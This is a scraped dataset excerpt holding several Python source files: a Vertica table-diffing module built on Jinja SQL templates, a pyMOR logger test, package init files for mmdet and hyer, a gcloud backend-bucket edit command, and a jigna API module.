                  output_schema: str,
                  x_table: str,
                  join_cols: list,
                  max_rows_all: int,
                  skip_row_total: bool = False) -> dict:
    '''Summarize the rows of the <x_table>_DIFF table.

    :param cur: vertica python Cursor.
    :param output_schema: schema holding the _DIFF and _JOINED tables.
    :param x_table: base name; reads <x_table>_DIFF and samples via <x_table>_JOINED.
    :param join_cols: join-key columns used to uniquify and join diff rows.
    :param max_rows_all: LIMIT applied to the sample of differing rows.
    :param skip_row_total: if True, return only {'total_count': ...}.
    :return: dict with 'total_count' (cell-by-cell differences) and, unless
        skipped, 'count' (rows with >0 differences on the join keys),
        'query' and 'sample'.
    '''
    LOGGER.debug("Getting diff rows")
    # first get the count
    q = JINJA_ENV.get_template('table_rows.sql').render(
        schema_name=output_schema,
        table_name=(x_table + '_DIFF'))
    LOGGER.info(q)
    cur.execute(q)
    diff_total_count = cur.fetchall()[0]['COUNT']
    if skip_row_total:
        LOGGER.debug("Skipping sample of rows with differences, query to get that sample, and the total # of rows with > 0 differences. Returning only 'total_count', the sum of cell-by-cell differences.")
        return {'total_count': diff_total_count}
    # Count of distinct rows (unique on the join keys) with at least one difference.
    q = JINJA_ENV.get_template('table_rows_uniq.sql').render(schema_name=output_schema, table_name=(x_table + '_DIFF'), join_cols=', '.join(join_cols))
    LOGGER.info(q)
    cur.execute(q)
    diff_row_count = cur.fetchall()[0]['COUNT']
    # we'll pull all columns from the joined table
    q = JINJA_ENV.get_template('diff_rows_sample.sql').render(
        schema_name=output_schema,
        joined_table=(x_table + '_JOINED'),
        diff_table=(x_table + '_DIFF'),
        group_cols=', '.join(join_cols),
        join_cols=' AND '.join(['x.{0} <=> joined.{0}'.format(col) for col in join_cols])
    )
    LOGGER.info(q)
    cur.execute(q + ' LIMIT ' + str(max_rows_all))
    diff_rows = pd.DataFrame(cur.fetchall())
    return {'query': q, 'sample': diff_rows,
            'count': diff_row_count, 'total_count': diff_total_count}
def get_diff_rows_from_joined(cur: Cursor,
                              grouped_column_diffs: dict,
                              output_schema: str,
                              x_table: str,
                              join_cols: list,
                              max_rows_all: int,
                              skip_row_total: bool = False) -> dict:
    '''Get diff rows from joined table.

    Non self-explanatory argument specifics:
    - grouped_column_diffs: per-column diff info; each value must carry a
      'count' key (as built by get_column_diffs_from_joined()).
    - max_rows_all: number of rows to get for the sample (only relevant if skip_row_total=F)
    - skip_row_total: skip sample of rows with differences, query to get that sample, and the total # of rows with > 0 differences. Return only 'total_count', the sum of cell-by-cell differences.

    Returned data specifics:
    - dict with 4 keys:
        - total_count: total number of cell-by-cell differences between the two tables.
        - query: query to get a sample of rows with >0 differences.
        - sample: dataframe of those sample rows
        - count: count of rows with >0 differences.
    - NOTE(review): on the skip path (skip_row_total, or no differing columns)
      the 'query' key is absent and 'sample' is an empty list, not a DataFrame.
    '''
    LOGGER.debug("Getting diff rows: get_diff_rows_from_joined()")
    # The cell-by-cell total is just the sum of the per-column counts.
    diff_total_count = sum([info['count'] for info in grouped_column_diffs.values()])
    if skip_row_total or (len(grouped_column_diffs) == 0):
        LOGGER.debug("Skipping sample of rows with differences, query to get that sample, and the total # of rows with > 0 differences. Returning only 'total_count', the sum of cell-by-cell differences.")
        return {
            'sample': [],
            'count': 0,
            'total_count': diff_total_count
        }
    LOGGER.info(grouped_column_diffs)
    # Count joined-table rows where any of the differing columns differ.
    q = JINJA_ENV.get_template('joined_rows_count.sql').render(
        joined_schema=output_schema,
        joined_table=(x_table + '_JOINED'),
        columns=grouped_column_diffs.keys()
    )
    LOGGER.info(q)
    cur.execute(q)
    diff_row_count = cur.fetchall()[0]['COUNT']
    # we'll pull all columns from the joined table
    q = JINJA_ENV.get_template('joined_rows_sample.sql').render(
        joined_schema=output_schema,
        joined_table=(x_table + '_JOINED'),
        columns=grouped_column_diffs.keys()
    )
    LOGGER.info(q)
    cur.execute(q + ' LIMIT ' + str(max_rows_all))
    diff_rows = pd.DataFrame(cur.fetchall())
    return {'query': q, 'sample': diff_rows,
            'count': diff_row_count, 'total_count': diff_total_count}
def get_diff_columns(cur: Cursor, output_schema: str, x_table: str) -> pd.DataFrame:
    """Return the per-column summary of the <x_table>_DIFF table as a DataFrame.

    Vertica caps the number of columns per table (~1600), so the summary is
    small enough to fetch in one go without a preliminary count or LIMIT.
    """
    LOGGER.debug("Getting diff columns")
    summary_q = JINJA_ENV.get_template('diff_column_summary.sql').render(
        schema_name=output_schema,
        table_name=(x_table + '_DIFF'))
    cur.execute(summary_q)
    return pd.DataFrame(cur.fetchall())
def get_column_diffs(diff_columns: pd.DataFrame, cur: Cursor,
                     output_schema: str,
                     x_schema: str, x_table: str,
                     y_schema: str, y_table: str,
                     join_cols: list,
                     max_rows_column: int,
                     all_col_info_df: pd.DataFrame,
                     hierarchical: bool = False) -> dict:
    '''Get detailed per-column diff information from the _DIFF table.

    :param diff_columns: per-column summary (from get_diff_columns()); must
        carry 'column_name' and 'COUNT' columns.
    :param cur: vertica python Cursor.
    :param output_schema: schema holding the _JOINED and _DIFF tables.
    :param x_schema: schema of the x table (used for hierarchical samples).
    :param x_table: x table name; also the base of the _JOINED/_DIFF names.
    :param y_schema: schema of the y table (used for hierarchical samples).
    :param y_table: y table name (used for hierarchical samples).
    :param join_cols: join-key columns.
    :param max_rows_column: LIMIT applied to per-column sample queries.
    :param all_col_info_df: dtype info per column ('x_dtype'/'y_dtype'),
        indexed by column name; drives the numeric/date extras.
    :param hierarchical: if True, also sample per side with the join keys.
    :return: {column_name: {'count', 'q', 'df', 'q_raw', 'df_raw', plus
        'q_h_x'/'df_h_x'/'q_h_y'/'df_h_y' when hierarchical, plus
        'q_n'/'df_n'/'q_n_sample'/'df_n_sample' for numeric/date columns}}.
    '''
    LOGGER.debug("Getting column diffs")
    # get total count, list of most common differing pairs for each column
    # list of (count, query, df)
    grouped_column_diffs = {row.column_name: {'count': row['COUNT']} for i, row in diff_columns.iterrows()}
    for column_name, info in grouped_column_diffs.items():
        LOGGER.info('Getting detailed diff for column: ' + str(column_name) + ' with ' + str(info['count']) + ' differences.')
        # Grouped (most common) differing value pairs for this column.
        q = JINJA_ENV.get_template('diff_column.sql').render(
            column=column_name,
            joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
            diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
            group_cols=', '.join(join_cols),
            join_cols=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
        )
        info['q'] = q
        # Raw (row-level) differing values, keyed by the join columns.
        q_raw = JINJA_ENV.get_template('diff_column_raw.sql').render(
            column=column_name,
            joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
            diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
            join_cols=join_cols,
            join_cols_join=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
        )
        info['q_raw'] = q_raw
        cur.execute(q + ' LIMIT ' + str(max_rows_column))
        info['df'] = pd.DataFrame(cur.fetchall())
        cur.execute(q_raw + ' LIMIT ' + str(max_rows_column))
        info['df_raw'] = pd.DataFrame(cur.fetchall())
        if hierarchical:
            # Per-side hierarchical samples; the unlimited variant is only
            # recorded as a query string, the limited one is executed.
            for schema, table, side in ((x_schema, x_table, 'x'), (y_schema, y_table, 'y')):
                for limit in (None, max_rows_column):
                    q_h = JINJA_ENV.get_template('diff_column_hier.sql').render(
                        column=column_name,
                        diff_schema=output_schema,
                        diff_table=(x_table + '_DIFF'),
                        join_cols=', '.join(join_cols),
                        first_join_col=join_cols[0],
                        schema=schema,
                        table=table,
                        limit=limit
                    )
                    if limit is None:
                        info['q_h_' + side] = q_h
                    else:
                        cur.execute(q_h)
                        info['df_h_' + side] = pd.DataFrame(cur.fetchall())
        row = all_col_info_df.loc[column_name, :]
        is_numeric = (is_numeric_like(row.x_dtype) and is_numeric_like(row.y_dtype))
        is_date = (is_date_like(row.x_dtype) and is_date_like(row.y_dtype))
        if is_numeric or is_date:
            # Numeric/date columns additionally get binned difference
            # magnitudes (at most 10 tiles, at least 1) and a sorted sample.
            info['q_n'] = JINJA_ENV.get_template('diff_column_numeric_diffs_binned.sql').render(
                column=column_name,
                joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
                diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
                group_cols=', '.join(join_cols),
                join_cols=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
                tiles=min({max({1, info['count']}), 10}))
            cur.execute(info['q_n'])
            info['df_n'] = pd.DataFrame(cur.fetchall())
            info['q_n_sample'] = JINJA_ENV.get_template('diff_column_numeric_diffs_sorted.sql').render(
                column=column_name,
                joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
                diff_schema=output_schema, diff_table=(x_table + '_DIFF'),
                join_cols=join_cols,
                join_cols_join=' AND '.join(['diff.{0} <=> joined.{0}'.format(col) for col in join_cols]),
            )
            cur.execute(info['q_n_sample'] + ' LIMIT ' + str(max_rows_column))
            info['df_n_sample'] = pd.DataFrame(cur.fetchall())
    return grouped_column_diffs
def get_column_diffs_from_joined(cur: Cursor,
                                 output_schema: str,
                                 x_schema: str, x_table: str,
                                 y_schema: str, y_table: str,
                                 join_cols: list,
                                 max_rows_column: int,
                                 all_col_info_df: pd.DataFrame,
                                 comparable_filter,
                                 hierarchical: bool = False) -> dict:
    '''Get column-by-column diffs directly from the joined table.

    Non self-explanatory argument specifics:
    - max_rows_column: number of rows to pull for sample differing cells on each column.
    - all_col_info_df: dataframe with the following columns:
        - index: column names.
        - x_dtype.
        - y_dtype.
    - comparable_filter: an 0/1 index on all_col_info_df to filter on columns to compare.
        - in cli.py, this filter/index is set using datatype matching and the user-supplied list of columns to exclude.
    - hierarchical: if true, additional outputs are included for each columns that are samples with the join keys.

    Returned data specifics:
    - dict grouped_column_diffs:
        - each `key` is a string column name for columns that matches on name between x and y tables (and are comparable on dtype, not excluded by user-supplied list).
        - each `value` is a dictionary with the following keys:
            - {'count': diff_count, 'df': df, 'df_raw': df_raw, 'q': q, 'q_raw': q_raw}.
            - if `hierarchical` is true: `{q,d}_h_{x,y}` (q for query, d for dataframe sample) from x and y tables, respectively.
            - if numeric of date: `{q,df}_n{,_sample}` (q for query, df for dataframe), the `_sample` is the biggest diffs, while the former are the binned differences.
    - entries are ordered by descending diff count.
    '''
    # Columns to compare: pass the comparable filter and are not join keys.
    column_list_to_compare = all_col_info_df.loc[comparable_filter & ~all_col_info_df.index.isin(join_cols), :].index.values
    LOGGER.info("Getting column diffs for columns:")
    LOGGER.info(",".join(column_list_to_compare))
    grouped_column_diffs = {}
    for column in column_list_to_compare:
        LOGGER.info("=" * 80)
        LOGGER.info(column)
        # Cheap count first; the detailed queries only run when diffs exist.
        joined_count_q = JINJA_ENV.get_template('joined_count.sql').render(
            column=column,
            joined_schema=output_schema,
            joined_table=(x_table + '_JOINED')
        )
        LOGGER.info(joined_count_q)
        cur.execute(joined_count_q)
        diff_count = cur.fetchall()[0]['COUNT']
        if diff_count > 0:
            LOGGER.info('Getting detailed diff for column: ' + str(column) + ' with ' + str(diff_count) + ' differences.')
            # Grouped (most common) differing value pairs for this column.
            q = JINJA_ENV.get_template('joined_column.sql').render(
                column=column,
                joined_schema=output_schema, joined_table=(x_table + '_JOINED')
            )
            # Raw (row-level) differing values, keyed by the join columns.
            q_raw = JINJA_ENV.get_template('joined_column_raw.sql').render(
                column=column,
                joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
                join_cols=join_cols
            )
            LOGGER.info(q)
            cur.execute(q + ' LIMIT ' + str(max_rows_column))
            df = pd.DataFrame(cur.fetchall())
            LOGGER.info(q_raw)
            cur.execute(q_raw + ' LIMIT ' + str(max_rows_column))
            df_raw = pd.DataFrame(cur.fetchall())
            grouped_column_diffs[column] = {'count': diff_count, 'df': df, 'df_raw': df_raw, 'q': q, 'q_raw': q_raw}
            LOGGER.info(grouped_column_diffs[column])
            if hierarchical:
                # Per-side samples with the join keys; the unlimited variant
                # is only recorded as a query string, the limited one is run.
                for schema, table, side in ((x_schema, x_table, 'x'), (y_schema, y_table, 'y')):
                    for limit in (None, max_rows_column):
                        q_h = JINJA_ENV.get_template('joined_column_hier.sql').render(
                            column=column,
                            joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
                            join_cols=join_cols,
                            schema=schema,
                            table=table,
                            limit=limit
                        )
                        if limit is None:
                            grouped_column_diffs[column]['q_h_' + side] = q_h
                        else:
                            cur.execute(q_h)
                            grouped_column_diffs[column]['df_h_' + side] = pd.DataFrame(cur.fetchall())
            row = all_col_info_df.loc[column, :]
            is_numeric = (is_numeric_like(row.x_dtype) and is_numeric_like(row.y_dtype))
            is_date = (is_date_like(row.x_dtype) and is_date_like(row.y_dtype))
            if is_numeric or is_date:
                # Numeric/date columns also get binned difference magnitudes
                # (at most 10 tiles, at least 1) and a sorted sample.
                grouped_column_diffs[column]['q_n'] = JINJA_ENV.get_template('joined_column_numeric_diffs_binned.sql').render(
                    column=column,
                    joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
                    tiles=min({max({1, grouped_column_diffs[column]['count']}), 10}))
                cur.execute(grouped_column_diffs[column]['q_n'])
                grouped_column_diffs[column]['df_n'] = pd.DataFrame(cur.fetchall())
                grouped_column_diffs[column]['q_n_sample'] = JINJA_ENV.get_template('joined_column_numeric_diffs_sorted.sql').render(
                    column=column,
                    joined_schema=output_schema, joined_table=(x_table + '_JOINED'),
                    join_cols=join_cols
                )
                cur.execute(grouped_column_diffs[column]['q_n_sample'] + ' LIMIT ' + str(max_rows_column))
                grouped_column_diffs[column]['df_n_sample'] = pd.DataFrame(cur.fetchall())
        else:
            LOGGER.info('NOT getting detailed diff for column: ' + str(column) + ' with ' + str(diff_count) + ' differences.')
    LOGGER.info(len(grouped_column_diffs))
    # Rebuild the dict in descending-count order (dicts preserve insertion order).
    grouped_column_diffs_sorted = {x: grouped_column_diffs[x] for x in sorted(grouped_column_diffs.keys(), key=lambda x: grouped_column_diffs[x]['count'], reverse=True)}
    LOGGER.info(len(grouped_column_diffs_sorted))
    return grouped_column_diffs_sorted
| 46.248288 | 214 | 0.614758 |
acfb71dacff93654acba672b65d01246085593d3 | 1,263 | py | Python | src/pymortests/core/logger.py | hvhue/pymor | 0815d74514fa5c4e0ad6f379f29abdd7d067cedd | [
"Unlicense"
] | null | null | null | src/pymortests/core/logger.py | hvhue/pymor | 0815d74514fa5c4e0ad6f379f29abdd7d067cedd | [
"Unlicense"
] | null | null | null | src/pymortests/core/logger.py | hvhue/pymor | 0815d74514fa5c4e0ad6f379f29abdd7d067cedd | [
"Unlicense"
] | null | null | null | # This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2020 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
import logging
import pymor.core as core
from pymor.core.logger import log_levels
from pymor.operators.numpy import NumpyMatrixOperator
from pymortests.base import (runmodule,)
def test_logger():
    """Smoke-test the operator logger at several levels and verbosities."""
    logger = NumpyMatrixOperator._logger
    # Each numeric level must be enabled once set as the logger's own level.
    for name in ('WARN', 'ERROR', 'DEBUG', 'INFO'):
        level = getattr(logging, name)
        logger.setLevel(level)
        assert logger.isEnabledFor(level)
    # Emit one record through each of the standard logging methods.
    for verb in ('warning', 'error', 'debug', 'info'):
        log_method = getattr(logger, verb)
        log_method(f'{verb} -- logger {str(logger)}')
def test_empty_log_message():
    """Logging an empty message must not raise.

    Uses ``warning`` instead of the deprecated ``Logger.warn`` alias
    (deprecated since Python 3.3).
    """
    core.logger.getLogger('test').warning('')
def test_log_levels():
    """log_levels must apply the mapped level inside the context and restore it on exit."""
    logger = NumpyMatrixOperator._logger
    before_name = 'INFO'
    logger.setLevel(before_name)
    before = logger.level
    with log_levels({logger.name: 'DEBUG'}):
        # inside the context the mapped level ('DEBUG') is in effect
        assert 'DEBUG' == logging.getLevelName(logger.level)
        assert logger.level != before
    # on exit the previous level must be restored
    assert logger.level == before
    assert before_name == logging.getLevelName(logger.level)
if __name__ == "__main__":
runmodule(filename=__file__)
| 31.575 | 85 | 0.706255 |
acfb71ebebe0bdd5c0601073409a77ddae1e1b1e | 371 | py | Python | detection/scrfd/mmdet/models/roi_heads/bbox_heads/__init__.py | qaz734913414/insightface | 4101fe608ca1d38604a23d53f32314ce8a28fe79 | [
"MIT"
] | 12,377 | 2017-12-04T02:46:57.000Z | 2022-03-31T16:48:31.000Z | mmdet/models/roi_heads/bbox_heads/__init__.py | Oz-art/mmdetection | d3cf38d91c454b1a6881e8c36c1e4a66dc5521b8 | [
"Apache-2.0"
] | 1,851 | 2017-12-05T05:41:23.000Z | 2022-03-30T13:06:22.000Z | mmdet/models/roi_heads/bbox_heads/__init__.py | Oz-art/mmdetection | d3cf38d91c454b1a6881e8c36c1e4a66dc5521b8 | [
"Apache-2.0"
] | 4,198 | 2017-12-05T02:57:19.000Z | 2022-03-30T10:29:37.000Z | from .bbox_head import BBoxHead
from .convfc_bbox_head import (ConvFCBBoxHead, Shared2FCBBoxHead,
Shared4Conv1FCBBoxHead)
from .double_bbox_head import DoubleConvFCBBoxHead
from .sabl_head import SABLHead
__all__ = [
'BBoxHead', 'ConvFCBBoxHead', 'Shared2FCBBoxHead',
'Shared4Conv1FCBBoxHead', 'DoubleConvFCBBoxHead', 'SABLHead'
]
| 33.727273 | 65 | 0.74124 |
acfb72d7600e44ba1ef4a2bdd59722f5cb1b861d | 265 | py | Python | hyer/__init__.py | pyx/hyer | cd3a27f2194a7f02eb9a14788f599fe3efe85f10 | [
"BSD-3-Clause"
] | 17 | 2015-02-27T04:48:08.000Z | 2021-09-23T09:01:07.000Z | hyer/__init__.py | pyx/hyer | cd3a27f2194a7f02eb9a14788f599fe3efe85f10 | [
"BSD-3-Clause"
] | null | null | null | hyer/__init__.py | pyx/hyer | cd3a27f2194a7f02eb9a14788f599fe3efe85f10 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2014-2016, Philip Xu <pyx@xrefactor.com>
# License: BSD New, see LICENSE for details.
"""Hyer - Hy enhanced routing"""
__version__ = (0, 1)
__release__ = '.dev0'
VERSION = '%d.%d' % __version__ + __release__
__all__ = [
]
| 20.384615 | 56 | 0.645283 |
acfb72e9ab30e5c24bd73a64b884921ef73e3cc9 | 2,735 | py | Python | lib/surface/compute/backend_buckets/edit.py | bopopescu/SDK | e6d9aaee2456f706d1d86e8ec2a41d146e33550d | [
"Apache-2.0"
] | null | null | null | lib/surface/compute/backend_buckets/edit.py | bopopescu/SDK | e6d9aaee2456f706d1d86e8ec2a41d146e33550d | [
"Apache-2.0"
] | null | null | null | lib/surface/compute/backend_buckets/edit.py | bopopescu/SDK | e6d9aaee2456f706d1d86e8ec2a41d146e33550d | [
"Apache-2.0"
] | 2 | 2020-11-04T03:08:21.000Z | 2020-11-05T08:14:41.000Z | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for modifying backend buckets."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class EditAlpha(base_classes.BaseEdit):
"""Modify backend buckets."""
@staticmethod
def Args(parser):
base_classes.BaseEdit.Args(parser)
parser.add_argument(
'name',
help='The name of the backend bucket to modify.')
@property
def service(self):
return self.compute.backendBuckets
@property
def resource_type(self):
return 'backendBuckets'
@property
def example_resource(self):
uri_prefix = ('https://www.googleapis.com/compute/alpha/projects/'
'my-project/')
return self.messages.BackendBucket(
bucketName='gcs-bucket-1',
description='My backend bucket',
name='backend-bucket',
selfLink=uri_prefix + 'global/backendBuckets/backend-bucket',
)
def CreateReference(self, args):
return self.CreateGlobalReference(args.name)
@property
def reference_normalizers(self):
return []
def GetGetRequest(self, args):
return (
self.service,
'Get',
self.messages.ComputeBackendBucketsGetRequest(
project=self.project,
backendBucket=self.ref.Name()))
def GetSetRequest(self, args, replacement, _):
return (
self.service,
'Update',
self.messages.ComputeBackendBucketsUpdateRequest(
project=self.project,
backendBucket=self.ref.Name(),
backendBucketResource=replacement))
EditAlpha.detailed_help = {
'brief': 'Modify backend buckets',
'DESCRIPTION': """\
*{command}* can be used to modify a backend bucket. The backend
bucket resource is fetched from the server and presented in a text
editor. After the file is saved and closed, this command will
update the resource. Only fields that can be modified are
displayed in the editor.
The editor used to modify the resource is chosen by inspecting
the ``EDITOR'' environment variable.
""",
}
| 30.730337 | 74 | 0.690676 |
acfb738f8c8a6c5697ae1387d06ca5cfc7cab8ba | 304 | py | Python | jigna/api.py | David-Baddeley/jigna | 00192450515099d8abc74866ffe1e4f743fe2279 | [
"BSD-3-Clause"
] | 17 | 2015-02-19T15:35:09.000Z | 2021-06-21T09:50:00.000Z | jigna/api.py | David-Baddeley/jigna | 00192450515099d8abc74866ffe1e4f743fe2279 | [
"BSD-3-Clause"
] | 41 | 2015-02-12T13:15:01.000Z | 2019-07-22T21:06:23.000Z | jigna/api.py | David-Baddeley/jigna | 00192450515099d8abc74866ffe1e4f743fe2279 | [
"BSD-3-Clause"
] | 14 | 2015-02-26T06:19:27.000Z | 2020-11-03T07:10:11.000Z | from .template import Template
from .vue_template import VueTemplate
from .core.concurrent import Future
from .html_widget import HTMLWidget
# Wrapping the WebApp import so that you can use jigna even if you don't have
# tornado install
try:
from .web_app import WebApp
except ImportError:
pass
| 25.333333 | 77 | 0.792763 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.